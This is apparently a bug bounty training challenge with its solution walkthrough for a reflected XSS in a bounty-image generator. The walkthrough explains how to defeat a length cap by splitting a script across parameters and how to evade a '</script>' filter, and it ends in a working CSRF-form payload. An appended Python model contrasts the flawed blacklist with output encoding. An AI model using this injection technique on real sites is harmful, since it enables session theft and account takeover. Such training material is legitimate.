Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
"I've won a bounty" generator
Cross Site Scripting (XSS)
We know people love to say they've earned some bounties, so simply input your username and bounty amount and then generate your image!
Can you discover how the application works and if there's anything interesting happening? Perhaps there is XSS somewhere hidden here.
Completed the challenge?
You can browse the intended solution to this challenge below.
Firstly, you'll notice that the bounty amount value must be an integer, so it won't be vulnerable to anything interesting, but what else is sent with the request?
Currency and platform.
First we test each parameter with the basic XSS probe ">.
Which gives us in the response:
<input type="hidden" name="currency" value="dollar">">
<input type="hidden" name="platform" value="hackerone">">
Both platform and currency are reflected without encoding, so both are vulnerable to XSS. So let's just try
"><svg/onload=alert(0)>. Easy, right?
<input type="hidden" name="currency" value="test"><svg/o">
<div class="top-right" style="margin-top:25px;">
<input type="hidden" name="platform" value="test"><svg/on">
Hmm, it's restricting the length of our payload. So what can we do?
Since currency is reflected first, we set it to "><script>/* (the value used in the final payload below).
The /* characters will comment out everything that follows in the page, so what's next?
username! Ah yes, it may not be vulnerable to XSS on its own, but I can still add something like:
*/ alert(0) /*. This closes the comment, runs the alert, and opens a new comment.
Okay, lastly we need to end the comment and the script tag. If we try
platform=*/</script> then you'll discover the closing tag is replaced, so the final payload uses */</script/x> instead, which a browser still treats as the end of the script.
Final working payload:
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="https://www.bugbountytraining.com/challenges/challenge-11.php" method="POST" target="_blank">
<input type="hidden" name="username" value="*/alert(0)/*" />
<input type="hidden" name="bountyamnt" value="100" />
<input type="hidden" name="platform" value="*/</script/x>" />
<input type="hidden" name="currency" value=""><script>/*" />
<input type="submit" value="Submit request" />
</form>
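To make the defensive point of this walkthrough concrete, here is an added Python model (not the challenge's own PHP, which is not shown on the page) of the two server-side behaviours that matter: the truncation-plus-blacklist approach the walkthrough defeats, and contextual output encoding, which does not care how long the input is or which closing tag is filtered. The field order, the 13-character cap and a filter that strips the literal </script> are assumptions chosen to reproduce what the response snippets above show; executable_js approximates how a browser would read the first script block, including treating </script/x> as the closing tag.

```python
import html
import re

# Constructed model of the challenge page. The real template is not on the
# page, so the field order, the length cap and the filter are assumptions that
# reproduce only the behaviour the walkthrough shows.
FIELD_ORDER = ("currency", "username", "bountyamnt", "platform")
TEMPLATE = (
    '<input type="hidden" name="currency" value="{currency}">\n'
    '<input type="hidden" name="username" value="{username}">\n'
    '<input type="hidden" name="bountyamnt" value="{bountyamnt}">\n'
    '<input type="hidden" name="platform" value="{platform}">\n'
)
MAX_LEN = 13           # assumed per-field cap, matching the truncation seen above
BLOCKED = "</script>"  # assumed filter: the literal closing tag is removed

# The walkthrough's final payload, split per parameter (values from the page).
PAYLOAD = {
    "currency": '"><script>/*',
    "username": "*/alert(0)/*",
    "bountyamnt": "100",
    "platform": "*/</script/x>",
}


def render_vulnerable(params):
    """Truncate and blacklist, then concatenate the raw values into the markup."""
    cleaned = {}
    for name in FIELD_ORDER:
        value = params.get(name, "")[:MAX_LEN]
        cleaned[name] = value.replace(BLOCKED, "")
    return TEMPLATE.format(**cleaned)


def render_hardened(params):
    """Validate by type, then HTML-attribute-encode every reflected value."""
    if not re.fullmatch(r"\d+", params.get("bountyamnt", "")):
        raise ValueError("bountyamnt must be an integer")
    encoded = {
        name: html.escape(params.get(name, ""), quote=True) for name in FIELD_ORDER
    }
    return TEMPLATE.format(**encoded)


def has_injected_script(page):
    """The template contains no <script> at all, so any occurrence was injected."""
    return "<script" in page.lower()


def executable_js(page):
    """Approximate a browser: take the first <script> body up to an end tag whose
    name is 'script' (so </script/x> counts), then drop /* ... */ comments to see
    which statement would actually run. Returns None when there is no script."""
    m = re.search(r"<script>(.*?)</script[\s/>]", page, re.S | re.I)
    if not m:
        return None
    return re.sub(r"/\*.*?\*/", "", m.group(1), flags=re.S).strip()


if __name__ == "__main__":
    print(executable_js(render_vulnerable(PAYLOAD)))  # alert(0)
    print(executable_js(render_hardened(PAYLOAD)))    # None
```

The vulnerable renderer keeps every individual value within the cap and never emits a literal </script>, yet the three reflections still assemble into one script block whose comments hide the surrounding markup; the hardened renderer turns " and < into &quot; and &lt; inside the attribute, so no tag boundary is ever crossed regardless of length.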